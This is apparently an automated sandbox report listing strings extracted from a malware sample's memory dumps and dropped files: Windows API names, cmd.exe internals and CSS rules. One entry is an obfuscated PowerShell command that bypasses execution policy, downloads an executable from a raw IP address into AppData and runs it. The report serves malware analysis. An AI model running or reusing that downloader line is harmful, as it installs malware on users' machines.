_tell

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_ultoa

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_vsnwprintf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_w+E`w

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

_wcsicmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcslwr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcsnicmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcsupr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wpopen

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wtol

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_XcptFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

`.rdata

Ansi based on Dropped File (Roaming.exE.1622950302)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

ABOVENORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

AdjustTokenPrivileges

Ansi based on Dropped File (Roaming.exE.1622950302)

ADVAPI32

Ansi based on Dropped File (Roaming.exE.1622950302)

ADVAPI32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

AFFINITY

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

alexandrtok25b1

Ansi based on Memory/File Scan (inv2.doc.lnk.bin)

Alloc

Ansi based on Dropped File (System.dll.469766707)

AlwaysShowExt

Unicode based on Runtime Data (exE )

APerformArithmeticOperation: '%c'

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

APerformUnaryOperation: '%c'

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

AppData

Unicode based on Runtime Data (cmd.exe )

AppendMenuW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Application

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Args: `%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ASSOC

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

Attributes

Unicode based on Runtime Data (exE )

AuthenticodeEnabled

Unicode based on Runtime Data (cmd.exe )

AutoCheckSelect

Unicode based on Runtime Data (exE )

AutoRun

Unicode based on Runtime Data (cmd.exe )

background-color: #e9e9e9;

Ansi based on Dropped File (ext.default.css)

background-color: #fff;

Ansi based on Dropped File (ie179663103.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e5e5e5), to(#c5c5c5));

Ansi based on Dropped File (ext.default.css)

background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f1f1f1), to(#dddddd));

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

background-position: center bottom !important;

Ansi based on Dropped File (ext.default.css)

background-repeat: repeat-x;

Ansi based on Dropped File (ext.default.css)

background: #000;

Ansi based on Dropped File (ie179663103.css)

background: #f7f5e7;

Ansi based on Dropped File (ie179663103.css)

background: none repeat scroll 0 0 transparent

Ansi based on Dropped File (ext.default.css)

background: none;

Ansi based on Dropped File (ext.default.css)

background: url('../images/dd.arrow.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

background: url('../images/ddr.arrow.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

background: url('../images/li.bg.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

BeginPaint

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

BELOWNORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

border-bottom-left-radius: 5px;

Ansi based on Dropped File (ext.default.css)

border-bottom-right-radius: 5px;

Ansi based on Dropped File (ext.default.css)

border-radius: 0px;

Ansi based on Dropped File (ext.default.css)

border-radius: 5px;

Ansi based on Dropped File (ext.default.css)

border: 0;

Ansi based on Dropped File (ie179663103.css)

border: 2px solid #c3c0ab;

Ansi based on Dropped File (ie179663103.css)

border: none;

Ansi based on Dropped File (ext.default.css)

BrandingFormatString

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

BrowseInPlace

Unicode based on Runtime Data (exE )

%LOCALAPPDATA%\Temp

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%WINDIR%\System32\cmd.exe

Ansi based on Memory/File Scan (inv2.doc.lnk.bin)

callback%d

Unicode based on Dropped File (System.dll.469766707)

CallForAttributes

Unicode based on Runtime Data (exE )

calloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CallWindowProcW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CancelSynchronousIo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Category

Unicode based on Runtime Data (exE )

CCCC@40`P@

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

CEIPEnable

Unicode based on Runtime Data (exE )

CharNextA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CharNextW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CharPrevW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

chdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CHDIR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

CheckDlgButton

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

chEd20

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

clear: both;

Ansi based on Dropped File (ie179663103.css)

clip: rect(1px 1px 1px 1px); /* IE7 */

Ansi based on Dropped File (ie179663103.css)

CloseClipboard

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CloseHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CLSIDFromString

Ansi based on Dropped File (System.dll.469766707)

CMD Internal Error %s

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

cmd.exe

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

cmd.pdb

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Cmd: %s Type: %x

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CmdBatNotification

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDCMDLINE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDEXTVERSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CoCreateInstance

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

COLOR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

color: #464646;

Ansi based on Dropped File (ext.default.css)

color: #E08034;

Ansi based on Dropped File (ext.default.css)

Com+Enabled

Unicode based on Runtime Data (exE )

COMCTL32.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CompanyName

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

CompareFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CompletionChar

Unicode based on Runtime Data (cmd.exe )

ComputerName

Unicode based on Runtime Data (exE )

COMSPEC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Contacts

Unicode based on Runtime Data (exE )

content: "";

Ansi based on Dropped File (ext.default.css)

content: none;

Ansi based on Dropped File (ie179663103.css)

Control Panel\Desktop\ResourceLocale

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

COPY.EXE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

COPYCMD

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CopyFileExW

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CopyFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Corporation

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

CoTaskMemFree

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateBrushIndirect

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateDialogParamW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateFontIndirectW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateHardLinkW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreatePopupMenu

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateProcessW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateSymbolicLinkW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateThread

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

CreateWindowExW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

cursor: text;

Ansi based on Dropped File (ie179663103.css)

CWDIllegalInDLLSearch

Unicode based on Runtime Data (cmd.exe )

d%s%02d%s%02d

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

D3blc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

DataNavigator_LANG.update({JS_CancelChanges: 'Your data has changed. Are you sure you do not want to save them?',

Ansi based on Dropped File (lang-en.js)

dd/MM/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DefaultColor

Unicode based on Runtime Data (cmd.exe )

DEFINED

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DefWindowProcW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

DelayedExpansion

Unicode based on Runtime Data (cmd.exe )

DelayLoadFailureHook

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DeleteFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DeleteObject

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

DeleteProcThreadAttributeList

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

delims=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Description

Unicode based on Runtime Data (exE )

Desktop

Unicode based on Runtime Data (exE )

DestroyWindow

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

DeviceIoControl

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DevicePath

Unicode based on Runtime Data (exE )

DialogBoxParamW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

DIRCMD

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Disable

Unicode based on Runtime Data (exE )

DisableCMD

Unicode based on Runtime Data (cmd.exe )

DISABLEDELAYEDEXPANSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

DISABLEEXTENSIONS

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

DisableLocalOverride

Unicode based on Runtime Data (cmd.exe )

DisableMetaFiles

Unicode based on Runtime Data (cmd.exe )

DisableUNCCheck

Unicode based on Runtime Data (cmd.exe )

DisableUserModeCallbackFilter

Unicode based on Runtime Data (cmd.exe )

DispatchMessageW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

display: block;

Ansi based on Dropped File (ext.default.css)

display: inline-block;

Ansi based on Dropped File (ext.default.css)

display: inline;

Ansi based on Dropped File (ie179663103.css)

display: none;

Ansi based on Dropped File (ext.default.css)

DLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

DocObject

Unicode based on Runtime Data (exE )

Documents

Unicode based on Runtime Data (exE )

DontPrettyPath

Unicode based on Runtime Data (exE )

Downloads

Unicode based on Runtime Data (exE )

DPATH

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DrawTextW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

DriveMask

Unicode based on Runtime Data (exE )

DuplicateHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ease wait while Setup is loading...

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

EFAULT\Control Panel\International

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

EmptyClipboard

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

en-US

Unicode based on Runtime Data (cmd.exe )

ENABLEDELAYEDEXPANSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

EnableExtensions

Unicode based on Runtime Data (cmd.exe )

ENABLEEXTENSIONS

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

EnableMenuItem

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

EnableWindow

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

EndDialog

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

EndPaint

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

EnterCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ERASE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

error

Unicode based on Dropped File (System.dll.469766707)

Error launching installer

Unicode based on Dropped File (Roaming.exE.1622950302)

Error writing temporary file. Make sure your temp folder is valid.

Unicode based on Dropped File (Roaming.exE.1622950302)

ERRORLEVEL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs C:\Users\%USERNAME%\AppData\Roaming.exE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

EXIST

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ExitProcess

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ExitWindowsEx

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Extensions

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init();

Ansi based on Dropped File (unternehmen.jsp)

faultColor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Favorites

Unicode based on Runtime Data (exE )

fdpnxsatz

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ferror

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fffffox

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

fffox

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

fflush

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fgets

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FileTimeToLocalFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FileTimeToSystemTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FillConsoleOutputAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FillConsoleOutputCharacterW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FillRect

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Filter

Unicode based on Runtime Data (exE )

filter: alpha(opacity=0);

Ansi based on Dropped File (ie179663103.css)

filter: alpha(opacity=70);

Ansi based on Dropped File (ie179663103.css)

filter: FlipH;

Ansi based on Dropped File (ie179663103.css)

filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe5e5e5', endColorstr='#ffc5c5c5', GradientType=0);

Ansi based on Dropped File (ext.default.css)

filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff1f1f1', endColorstr='#ffdddddd', GradientType=0);

Ansi based on Dropped File (ext.default.css)

FindClose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstFileExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstStreamW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindNextFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindNextStreamW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindWindowExW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

float: left;

Ansi based on Dropped File (ext.default.css)

FlushConsoleInputBuffer

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FlushFileBuffers

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FolderTypeID

Unicode based on Runtime Data (exE )

font-family: 'BenchNine', sans-serif;

Ansi based on Dropped File (ext.default.css)

font-size: 16px;

Ansi based on Dropped File (ext.default.css)

font-size: 18px;

Ansi based on Dropped File (ext.default.css)

font-weight: 400;

Ansi based on Dropped File (ext.default.css)

FOR /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FOR/?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FormatMessageW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fprintf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FreeEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FreeLibrary

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GDI32.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Generation

Unicode based on Runtime Data (exE )

GetACP

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetBinaryTypeW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetClassInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetClientRect

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetCommandLineW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleOutputCP

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleScreenBufferInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleTitleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleWindow

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDateFormatW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDC

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetDeviceCaps

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetDiskFreeSpaceExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDiskFreeSpaceW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetDlgItem

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetDlgItemTextW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetDriveTypeW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetEnvironmentVariableW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetExitCodeProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileAttributesExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileSize

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileType

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileVersionInfoSizeW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetFileVersionInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocaleInfoW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetMessagePos

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetModuleFileNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetModuleHandleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetNumaHighestNodeNumber

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetNumaNodeProcessorMaskEx

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GeToken: (%x) '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetPrivateProfileStringW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetProcessHeap

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetShortPathNameW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetStartupInfoW

